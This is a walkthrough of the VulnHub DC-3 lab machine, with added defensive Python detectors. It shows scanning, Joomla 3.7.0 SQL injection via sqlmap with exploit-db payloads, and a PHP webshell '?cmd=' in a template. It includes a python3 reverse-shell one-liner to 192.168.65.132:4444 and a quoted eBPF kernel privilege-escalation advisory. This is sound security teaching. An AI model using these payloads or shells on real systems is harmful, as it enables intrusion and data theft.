DC-3 target machine penetration test
- Target machine: https://www.vulnhub.com/entry/dc-32,312/
- Difficulty: low
- Goal: obtain root privileges and the flag
- DC-3 is a penetration-testing target machine published on VulnHub, intended for practising web application security and penetration-testing skills.
- Its distinguishing feature is that only port 80 is open, serving the Joomla CMS on an Apache web server, which makes it suitable for beginners practising basic techniques such as information gathering, vulnerability scanning and privilege escalation.
- Basic environment setup
- Obtain the DC-3 image file (e.g. DC-3.zip) from the VulnHub site or a third-party mirror and extract it into VMware or the Kali virtual machine.
- Networking: put the target and the attacker machine in the same NAT or bridged network so that both are on the same LAN.
- IP discovery: sweep the target's subnet with nmap (e.g. 192.168.96.128/24) to determine the target's real IP (e.g. 192.168.96.131) and the attacker's IP (e.g. 192.168.96.128).
- Penetration steps
- Information gathering
- Run a full nmap scan of the target's ports and services, confirm that port 80 is open and identify the Apache/Joomla environment.
- Open the target IP in a browser (e.g. http://192.168.96.131) and read the hints on the home page.
- Vulnerability scanning and exploitation
- Install the JoomScan tool (via the Kali package manager) and run a Joomla-specific scan to find the admin path (e.g. /administrator/).
- Use nikto to scan for web vulnerabilities or misconfigurations.
- Privilege escalation
- Try weak-password logins to the admin panel, or known Joomla vulnerabilities (component bugs, misconfigurations), to obtain administrator privileges.
- If there is no direct way in, fall back to routine techniques such as file upload or SQL injection.
- Notes
- The machine is deliberately simple and mainly tests basic penetration skills; combining tools (nmap, JoomScan, nikto) is recommended over purely manual work.
- To raise the difficulty, try disabling the built-in hints or varying the attack path.
- https://developer.aliyun.com/article/1362873 (related documentation)
Information gathering
Host discovery
1. Check the network segment
[code]
ipconfig
192.68.65.132
[/code]
Our host is in the 192.168.65.0 segment.
2. Host discovery
[code]
└─# nmap -sn 192.168.65.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-17 03:17 EDT
Nmap scan report for 192.168.65.1
Host is up (0.00020s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.65.2
Host is up (0.00012s latency).
MAC Address: 00:50:56:FA:BF:D8 (VMware)
Nmap scan report for 192.168.65.147
Host is up (0.00017s latency).
MAC Address: 00:0C:29:4E:5A:03 (VMware)
Nmap scan report for 192.168.65.254
Host is up (0.0049s latency).
MAC Address: 00:50:56:F5:D2:FC (VMware)
Nmap scan report for 192.168.65.132
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.40 seconds
[/code]
Knowing our own address tells us how to read the sweep: 192.168.65.132 (reported without a MAC address) is our own machine, so the remaining guest, 192.168.65.147, is the target.
3. Port scan
[code]
└─# nmap -sT --min-rate 10000 -p- 192.168.65.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-17 03:19 EDT
Nmap scan report for 192.168.65.147
Host is up (0.0017s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:4E:5A:03 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.29 seconds
[/code]
TCP service scan
[code]
└─# nmap -sT -sV -sC -O -p80 192.168.65.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-17 03:31 EDT
Nmap scan report for 192.168.65.147
Host is up (0.00042s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
MAC Address: 00:0C:29:4E:5A:03 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.29 seconds
[/code]
Analysis
- Host status
  - IP: 192.168.65.147
  - Status: up, latency 0.42 ms
  - MAC: 00:0C:29:4E:5A:03 (VMware virtual machine)
- Ports/services
  - 80/tcp open
  - Service: http
  - Software: Apache httpd 2.4.18 (Ubuntu)
  - CMS: Joomla! (open-source content management system)
  - Page title: Home
  - Server header: Apache/2.4.18 (Ubuntu)
- OS fingerprint
  - OS type: Linux 3.x – 4.x (most likely Ubuntu 16.04 with kernel 4.4)
- Network
  - Distance: 1 hop (same subnet)
- Suggested next steps
  - Web: Joomla 3.x default admin path /administrator; scan for vulnerabilities with joomscan or joomla-cves.
  - Directory brute-force: run gobuster/dirb against http://192.168.65.147/ looking for backups, configuration files and upload points.
  - Getting a shell: if the Joomla version is ≤ 3.4.6, try the CVE-2015-8562 deserialisation bug; if ≤ 3.7.0, try the CVE-2017-8917 SQL injection.
UDP scan
[code]
nmap -sU --top-ports 20 192.168.65.147
[/code]
Script scan
[code]
nmap --script=vuln -p80 192.168.65.147
[/code]
Web penetration
This is what the site looks like when opened in a browser.
There are no leads here, so we try the directory brute-force mentioned earlier.
Directory brute-force
[code]
dirsearch -u http://192.168.65.147
[/code]
We find the following:
Checking for known vulnerabilities
Start with joomscan.
1. JoomScan is an open-source vulnerability scanner dedicated to the Joomla CMS.
Install it directly on Kali:
[code]
sudo apt update && sudo apt install joomscan
[/code]
Basic usage:
[code]
# basic scan
joomscan -u http://192.168.65.147
# also brute-force enumerate components
joomscan -u http://192.168.65.147 --enumerate-components
# scan through a proxy
joomscan -u http://192.168.65.147 --proxy http://127.0.0.1:8080
[/code]
The Joomla version is identified.
Search for known exploits:
[code]
searchsploit Joomla 3.7.0
[/code]
There is a SQL injection; copy the exploit-db entry and read it:
[code]
cp /usr/share/exploitdb/exploits/php/webapps/42033.txt .
└─# cat 42033.txt
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917

URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Parameter: list[fullordering] (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (DUAL)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)
[/code]
We use sqlmap to try the injection against the target:
[code]
sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
[/code]
We find the joomladb database; list its tables:
[code]
└─# sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables
[/code]
Then query the users table directly to find the account and password columns:
[code]
sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" --columns
[/code]
Dump the username and password:
[code]
sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" -C username,password --dump
[/code]
[code]
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+
[/code]
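From the defender's side, every one of the requests above lands in the Apache access log, and CVE-2017-8917 is easy to spot there because the injected SQL sits in a single named parameter. The following Python script is an added example, not part of the write-up or of Joomla: it parses combined-format log lines, isolates requests to com_fields, and matches the list[fullordering] value against the SQL fragments that appear in the sqlmap payloads shown above (updatexml, SLEEP, FLOOR(RAND()), CASE WHEN ... UNION SELECT), while letting a normal sort value such as "a.title ASC" through. The log lines, regexes and function names are constructed for the example. The permanent fix is the vendor update (Joomla 3.7.1 patched this issue); the detection is for finding probes against hosts that have not yet been updated.

```python
"""Flag CVE-2017-8917 (Joomla 3.7.0 com_fields SQL injection) probes in an
Apache combined access log.

Added defensive example for this write-up; the log lines are constructed here
(the write-up only shows the attacker-side sqlmap commands), and the regexes
and function names are the example's own choices.
"""
import re
from urllib.parse import parse_qs, urlparse

# Apache "combined" log format: client ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# SQL fragments from the three payload classes in the exploit-db entry
# (error-based updatexml / FLOOR(RAND()), time-based SLEEP, boolean-based
# CASE WHEN ... UNION SELECT) plus their usual companions.
SQLI_RE = re.compile(
    r"(updatexml|extractvalue|sleep\s*\(|benchmark\s*\(|union\s+select|"
    r"case\s+when|information_schema|floor\s*\(\s*rand)",
    re.IGNORECASE,
)

# A legitimate Joomla sort value is a column reference plus an optional direction, e.g. "a.title ASC".
LEGIT_ORDERING_RE = re.compile(r"^[a-z_]+\.[a-z_]+(\s+(asc|desc))?$", re.IGNORECASE)


def parse_line(line):
    """Split one combined-format line into named fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse_request(path):
    """Return a finding for a com_fields request whose list[fullordering] carries SQL,
    or None for anything else.  parse_qs percent-decodes keys as well as values, so
    list%5Bfullordering%5D and list[fullordering] are treated identically."""
    query = parse_qs(urlparse(path).query, keep_blank_values=True)
    if query.get("option") != ["com_fields"]:
        return None
    for value in query.get("list[fullordering]", []):
        if LEGIT_ORDERING_RE.match(value.strip()):
            continue
        m = SQLI_RE.search(value)
        if m:
            return {"indicator": m.group(1).lower(), "value": value}
    return None


def scan_log(lines):
    """Run analyse_request over every parsable line and attach client context to each hit."""
    findings = []
    for line in lines:
        record = parse_line(line)
        if record is None:
            continue
        hit = analyse_request(record["path"])
        if hit:
            findings.append({"ip": record["ip"], "time": record["time"],
                             "status": record["status"], "agent": record["agent"], **hit})
    return findings


# Constructed sample: two probes from the attacker box used in the write-up
# (192.168.65.132), one normal article view and one legitimate admin sort.
SAMPLE_LOG = [
    '192.168.65.132 - - [17/Oct/2025:03:40:01 -0400] "GET /index.php?option=com_fields&view=fields'
    '&layout=modal&list[fullordering]=updatexml%27 HTTP/1.1" 500 1024 "-" "Mozilla/5.0"',
    '192.168.65.132 - - [17/Oct/2025:03:40:02 -0400] "GET /index.php?option=com_fields&view=fields'
    '&layout=modal&list%5Bfullordering%5D=%28SELECT+%2A+FROM+%28SELECT%28SLEEP%285%29%29%29GDiu%29'
    ' HTTP/1.1" 200 2048 "-" "sqlmap/1.8"',
    '192.168.65.10 - - [17/Oct/2025:03:41:00 -0400] "GET /index.php?option=com_content&view=article&id=1'
    ' HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.65.10 - - [17/Oct/2025:03:41:05 -0400] "GET /administrator/index.php?option=com_fields'
    '&view=fields&list[fullordering]=a.title+ASC HTTP/1.1" 200 7000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['indicator']:<12} status={f['status']} value={f['value']!r}")
```

Run against a real log with `scan_log(open("/var/log/apache2/access.log"))`; the 500 status on the error-based probe and the sqlmap user agent are useful secondary signals, but the parameter content is the reliable one since the agent is trivially changed (the write-up itself uses --random-agent).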
Crack the hash offline.
The password is recovered.
Reverse shell
Create a file and write a one-line webshell into it. Access path:
[code]
/templates/protostar/shell.php?cmd=id
[/code]
Check whether python3 is available.
It returns successfully.
Build the reverse shell:
[code]
python3 -c 'import socket,subprocess,os,pty;s=socket.socket();s.connect(("192.168.65.132",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'
[/code]
The shell connects back successfully.
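A template directory should never contain a PHP file that hands a request parameter to a command sink, which is exactly what the shell.php dropped above does. As an added example (not from the write-up or from Joomla), the Python below walks a templates tree, reads each PHP file, and flags any that route $_GET/$_POST/$_REQUEST/$_COOKIE data into system(), exec(), passthru(), eval() and similar calls, with a second label for the decode-then-eval pattern. The sample tree it builds in a temporary directory, including the planted shell, and the pattern lists are constructed for the example; function names are the example's own.

```python
"""Scan a Joomla template tree for PHP files with webshell characteristics.

Added defensive example for this write-up.  The planted file in the write-up
lives at /templates/protostar/shell.php and is driven by a ?cmd= parameter;
the scan below flags any PHP file that feeds request data straight into a
command-execution or code-evaluation sink.  The sample tree, its contents and
the pattern lists are constructed here, not taken from Joomla or the write-up.
"""
import os
import re
import shutil
import tempfile

# Sinks that execute commands or evaluate code.
SINK_RE = re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(", re.IGNORECASE)
# Superglobals carrying attacker-controlled request data.
SOURCE_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
# Decoders commonly wrapped around eval() to hide the payload.
OBFUSCATION_RE = re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\(", re.IGNORECASE)
PHP_SUFFIXES = (".php", ".phtml", ".php5", ".phar")


def classify_php(source):
    """Return indicator labels for one PHP source text; an empty list means nothing was found."""
    indicators = []
    sinks = sorted({m.group(1).lower() for m in SINK_RE.finditer(source)})
    if sinks and SOURCE_RE.search(source):
        indicators.append("request-to-sink:" + ",".join(sinks))
    if "eval" in sinks and OBFUSCATION_RE.search(source):
        indicators.append("obfuscated-eval")
    return indicators


def find_suspicious_php(root):
    """Walk root and return sorted (relative_path, indicators) pairs for flagged PHP files."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(PHP_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                indicators = classify_php(fh.read())
            if indicators:
                findings.append((os.path.relpath(path, root).replace(os.sep, "/"), indicators))
    return sorted(findings)


def build_demo_tree():
    """Create a constructed protostar-like template directory with one planted shell."""
    root = tempfile.mkdtemp(prefix="joomla_templates_")
    proto = os.path.join(root, "protostar")
    os.makedirs(os.path.join(proto, "html"))
    files = {
        # Legitimate-looking template files (constructed, simplified).
        os.path.join(proto, "index.php"):
            "<?php\ndefined('_JEXEC') or die;\n$app = JFactory::getApplication();\necho $this->title;\n",
        os.path.join(proto, "html", "pagination.php"):
            "<?php\ndefined('_JEXEC') or die;\nfunction pagination_list_footer($list) { return $list['pageslinks']; }\n",
        # The kind of one-line shell the write-up drops into the template directory (constructed).
        os.path.join(proto, "shell.php"):
            "<?php system($_GET['cmd']); ?>\n",
        # Non-PHP asset; the scan must ignore it.
        os.path.join(proto, "template_preview.png"): "not really a PNG",
    }
    for path, body in files.items():
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def scan_demo():
    """Build the constructed tree, scan it, remove it, and return the findings."""
    root = build_demo_tree()
    try:
        return find_suspicious_php(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for rel_path, indicators in scan_demo():
        print(f"{rel_path}: {'; '.join(indicators)}")
```

On a real install call `find_suspicious_php("/var/www/html/templates")`. Pattern matching catches the plain one-liner used here but not heavily obfuscated shells; comparing the tree against the hashes of the installed Joomla release, and alerting on any PHP file the web server user can write, are the stronger controls.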
Privilege escalation
Check the system version:
[code]
www-data@DC-3:/var/www/html/templates/protostar$ uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
www-data@DC-3:/var/www/html/templates/protostar$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04 LTS
Release:        16.04
Codename:       xenial
[/code]
Check for known exploits:
[code]
searchsploit Ubuntu 16.04
[/code]
First copy the file over and read it:
[code]
cp /usr/share/exploitdb/exploits/linux/local/39772.txt .
└─# cat 39772.txt
[/code]

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808

In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime, unprivileged code can use the bpf() syscall to load eBPF socket filter programs. These conditions are fulfilled in Ubuntu 16.04.

When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first function that touches the supplied eBPF instructions is replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF map file descriptors and looks up pointers for the corresponding map files. This is done as follows:

[code]
/* look for pseudo eBPF instructions that access map FDs and
 * replace them with actual map pointers */
static int replace_map_fd_with_map_ptr(struct verifier_env *env)
{
	struct bpf_insn *insn = env->prog->insnsi;
	int insn_cnt = env->prog->len;
	int i, j;

	for (i = 0; i < insn_cnt; i++, insn++) {
		[checks for bad instructions]

		if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
			struct bpf_map *map;
			struct fd f;

			[checks for bad instructions]

			f = fdget(insn->imm);
			map = __bpf_map_get(f);
			if (IS_ERR(map)) {
				verbose("fd %d is not pointing to valid bpf_map\n",
					insn->imm);
				fdput(f);
				return PTR_ERR(map);
			}

			[...]
		}
	}

	[...]
}
[/code]

__bpf_map_get contains the following code:

[code]
/* if error is returned, fd is released.
 * On success caller should complete fd access with matching fdput()
 */
struct bpf_map *__bpf_map_get(struct fd f)
{
	if (!f.file)
		return ERR_PTR(-EBADF);
	if (f.file->f_op != &bpf_map_fops) {
		fdput(f);
		return ERR_PTR(-EINVAL);
	}

	return f.file->private_data;
}
[/code]

The problem is that when the caller supplies a file descriptor number referring to a struct file that is not an eBPF map, both __bpf_map_get() and replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If __fget_light() detected that the file descriptor table is shared with another task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause the reference count of the struct file to be over-decremented, allowing an attacker to create a use-after-free situation where a struct file is freed although there are still references to it.

A simple proof of concept that causes oopses/crashes on a kernel compiled with memory debugging options is attached as crasher.tar.

One way to exploit this issue is to create a writable file descriptor, start a write operation on it, wait for the kernel to verify the file's writability, then free the writable file and open a readonly file that is allocated in the same place before the kernel writes into the freed file, allowing an attacker to write data to a readonly file. By e.g. writing to /etc/crontab, root privileges can then be obtained.

There are two problems with this approach:

The attacker should ideally be able to determine whether a newly allocated struct file is located at the same address as the previously freed one. Linux provides a syscall that performs exactly this comparison for the caller: kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).

In order to make exploitation more reliable, the attacker should be able to pause code execution in the kernel between the writability check of the target file and the actual write operation. This can be done by abusing the writev() syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays read accesses, then mmap()s a file containing a struct iovec from that FUSE filesystem and passes the result of mmap() to writev(). (Another way to do this would be to use the userfaultfd() syscall.)

writev() calls do_writev(), which looks up the struct file * corresponding to the file descriptor number and then calls vfs_writev(). vfs_writev() verifies that the target file is writable, then calls do_readv_writev(), which first copies the struct iovec from userspace using import_iovec(), then performs the rest of the write operation. Because import_iovec() performs a userspace memory access, it may have to wait for pages to be faulted in - and in this case, it has to wait for the attacker-owned FUSE filesystem to resolve the pagefault, allowing the attacker to suspend code execution in the kernel at that point arbitrarily.

An exploit that puts all this together is in exploit.tar. Usage:

[code]
user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in
[/code]
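The advisory states its preconditions precisely: kernel >= 4.4 built with CONFIG_BPF_SYSCALL, and kernel.unprivileged_bpf_disabled not set to 1. For a defender that is a three-line check, and the sysctl is the runtime mitigation the text itself names. The Python below is an added example, not part of the write-up or the exploit-db entry: it evaluates those conditions from a kernel release string and a sysctl value (so it can be unit-tested against the DC-3 values above) and can also read the live values from /proc. The labels "out-of-scope", "mitigated" and "exposed" and the function names are the example's own.

```python
"""Evaluate a host against the preconditions stated in the 39772 advisory text:
Linux >= 4.4 with CONFIG_BPF_SYSCALL, and kernel.unprivileged_bpf_disabled
not set to 1.  Added defensive example, not part of the write-up or the
exploit-db entry; labels and function names are the example's own."""
import platform
import re

SYSCTL_PATH = "/proc/sys/kernel/unprivileged_bpf_disabled"


def parse_kernel_version(release):
    """'4.4.0-21-generic' -> (4, 4, 0); missing minor/patch fields count as 0."""
    m = re.match(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor or 0), int(patch or 0))


def assess_unprivileged_bpf(release, sysctl_value, bpf_syscall_enabled=True):
    """Return 'out-of-scope', 'mitigated' or 'exposed'.

    out-of-scope: kernel older than 4.4, or built without CONFIG_BPF_SYSCALL
                  (then the sysctl does not exist and bpf() is unavailable).
    mitigated:    unprivileged_bpf_disabled is 1 (or 2 on newer kernels), so
                  unprivileged callers cannot load eBPF programs at all.
    exposed:      the advisory's preconditions hold.  Only a patched kernel
                  removes the bug itself, so this flags the exposure window;
                  it does not prove the running kernel is unpatched.
    """
    if not bpf_syscall_enabled or parse_kernel_version(release) < (4, 4):
        return "out-of-scope"
    if sysctl_value is not None and str(sysctl_value).strip() in ("1", "2"):
        return "mitigated"
    return "exposed"


def read_live_state():
    """Return (kernel release, sysctl value); the value is None when the sysctl is absent."""
    try:
        with open(SYSCTL_PATH) as fh:
            value = fh.read().strip()
    except OSError:
        value = None
    return platform.release(), value


def assess_live_host():
    """Assess the machine this runs on; an absent sysctl means no CONFIG_BPF_SYSCALL."""
    release, value = read_live_state()
    return release, value, assess_unprivileged_bpf(release, value, bpf_syscall_enabled=value is not None)


if __name__ == "__main__":
    # The write-up's target runs 4.4.0-21-generic on Ubuntu 16.04, where the
    # advisory says the conditions are fulfilled, i.e. the sysctl is not 1.
    print("DC-3 kernel:", assess_unprivileged_bpf("4.4.0-21-generic", "0"))
    print("this host:", assess_live_host())
```

Setting the sysctl (`sysctl -w kernel.unprivileged_bpf_disabled=1`, persisted in /etc/sysctl.d) closes the exposure window at runtime on any kernel that still reports "exposed"; the durable fix is a kernel that carries the patch, which is what the package updates for 16.04 deliver.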